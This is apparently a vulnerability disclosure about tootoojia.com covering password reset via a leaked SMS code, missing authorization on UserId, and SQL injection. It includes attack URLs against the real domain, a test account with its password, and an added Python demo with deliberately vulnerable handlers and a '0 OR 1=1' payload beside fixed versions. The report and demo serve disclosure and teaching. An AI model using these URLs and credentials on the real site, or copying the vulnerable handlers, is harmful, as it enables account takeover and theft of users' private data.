Arbitrary Password Reset + unauthorized access + SQL Injection
1. Reset any password: the SMS verification code is returned in the response body, so the reset can be completed without ever receiving the SMS (registration works the same way, so any mobile number can be registered).
2. Unauthorized access. The whole system has no authorization checks at all; this is not a case of over-broad permissions but of none. The UserId in the query string is trusted as-is. For example: 1) Request this URL and a shipping address is added to user ID 100001.
http://www.tootoojia.com/userAddress/AddAddress.htm?CityId=2&UserId=100001&DetailedAddress=wooyuntest&ProvinceId=1&DistrictId=10&RealName=%E5%93%E5%88%88&PhoneNumber=93%&Postcode=13888888888
2) Read the contact information of any user:
http://www.tootoojia.com/userAddress/ShowAddressList.htm?UserId=104853
3) Read the private messages and notifications of any user:
www.tootoojia.com/notice/noticeList.htm?Page=1&PageSize=20&UserId=
www.tootoojia.com/mail/GetMailUserList.htm?Page=1&PageSize=20&UserId=
4) Iterate over user IDs to follow users and inflate follower counts:
www.tootoojia.com/friend/AddFriend.htm?FollowId={parameter 1}&UserId={parameter 2}
There are too many to list one by one; liking and inviting can be abused the same way.
3. SQL injection. There are too many injection points; wherever there is a parameter there is an injection. One example is the UserId parameter:
http://www.tootoojia.com/Contact/ShowContactList?UserId=100000
Log in with account 16888888882 (the number pattern suggests these accounts were batch imported into the database); the password, stored as an MD5 hash, is 654123. Give it a try.
For user ID 100001, the shipping address was added successfully.
Solution:
1. Do not return the SMS verification code in the response; keep it server-side, time-limited and single-use.
2. Verify the identity of the requesting user server-side (take the user ID from the authenticated session, not from the UserId parameter).
3. Validate parameters and use parameterized queries instead of building SQL from request values.
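The following is an added example, not code from the original report or from tootoojia.com. It simulates the three weaknesses above and their fixes in Python with an in-memory SQLite database: the verification code leaking into the response, the UserId parameter being trusted (so any user's data can be read or written), and UserId being concatenated into SQL. The table names, the session dict, the user IDs and the function names are all assumptions.

```python
import hmac
import secrets
import sqlite3
import time


def make_db():
    """Constructed sample database standing in for the site's user store (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, phone TEXT);
        CREATE TABLE addresses(user_id INTEGER, detail TEXT);
        INSERT INTO users VALUES (100000, '13800000000');
        INSERT INTO users VALUES (100001, '13800000001');
        INSERT INTO addresses VALUES (100000, 'private address of user 100000');
    """)
    return db


# ---- 1. password-reset code returned to the client --------------------------
PENDING_CODES = {}  # phone -> (code, expiry); server-side store, never sent back


def send_code_vulnerable(phone):
    """Puts the SMS code in the response body, so the SMS itself is never needed."""
    code = f"{secrets.randbelow(10**6):06d}"
    PENDING_CODES[phone] = (code, time.time() + 300)
    return {"status": "ok", "code": code}


def send_code_fixed(phone):
    """Stores the code server-side only; the response carries no secret."""
    code = f"{secrets.randbelow(10**6):06d}"
    PENDING_CODES[phone] = (code, time.time() + 300)
    return {"status": "ok"}


def verify_code(phone, submitted):
    """Single-use (popped on first attempt), time-limited, constant-time comparison."""
    entry = PENDING_CODES.pop(phone, None)
    if entry is None:
        return False
    code, expiry = entry
    return time.time() < expiry and hmac.compare_digest(code, submitted)


# ---- 2./3. UserId trusted from the query string + string-built SQL ----------
def show_address_list_vulnerable(db, params):
    """Trusts ?UserId= and concatenates it into SQL: IDOR and SQL injection in one line."""
    sql = "SELECT detail FROM addresses WHERE user_id = " + params["UserId"]
    return [row[0] for row in db.execute(sql)]


def show_address_list_fixed(db, session, params):
    """Ignores ?UserId=; the owner comes from the authenticated session and the query is parameterized."""
    sql = "SELECT detail FROM addresses WHERE user_id = ?"
    return [row[0] for row in db.execute(sql, (session["user_id"],))]


def add_address_vulnerable(db, params):
    """Writes an address into whichever account the client names."""
    sql = ("INSERT INTO addresses VALUES (" + params["UserId"] + ", '"
           + params["DetailedAddress"] + "')")
    db.execute(sql)
    return True


def add_address_fixed(db, session, params):
    """Writes only into the session user's own account, with bound parameters."""
    db.execute("INSERT INTO addresses VALUES (?, ?)",
               (session["user_id"], params["DetailedAddress"]))
    return True


def demo():
    """Attacker is logged in as 100001 and targets 100000 (constructed scenario)."""
    db = make_db()
    attacker = {"user_id": 100001}
    idor = show_address_list_vulnerable(db, {"UserId": "100000"})     # other user's data
    sqli = show_address_list_vulnerable(db, {"UserId": "0 OR 1=1"})   # every row
    safe = show_address_list_fixed(db, attacker, {"UserId": "100000"})  # only own rows
    add_address_vulnerable(db, {"UserId": "100000", "DetailedAddress": "wooyuntest"})
    planted = [r[0] for r in db.execute("SELECT detail FROM addresses WHERE user_id = 100000")]
    return {"idor": idor, "sqli": sqli, "safe": safe, "planted": planted}


if __name__ == "__main__":
    print(demo())
    print(send_code_vulnerable("13800000001"), send_code_fixed("13800000001"))
```

The fixed handlers never read UserId from the request at all: once the account is bound to the session there is nothing for an attacker to iterate, and the bound parameter closes the injection even if the session value were somehow attacker-controlled.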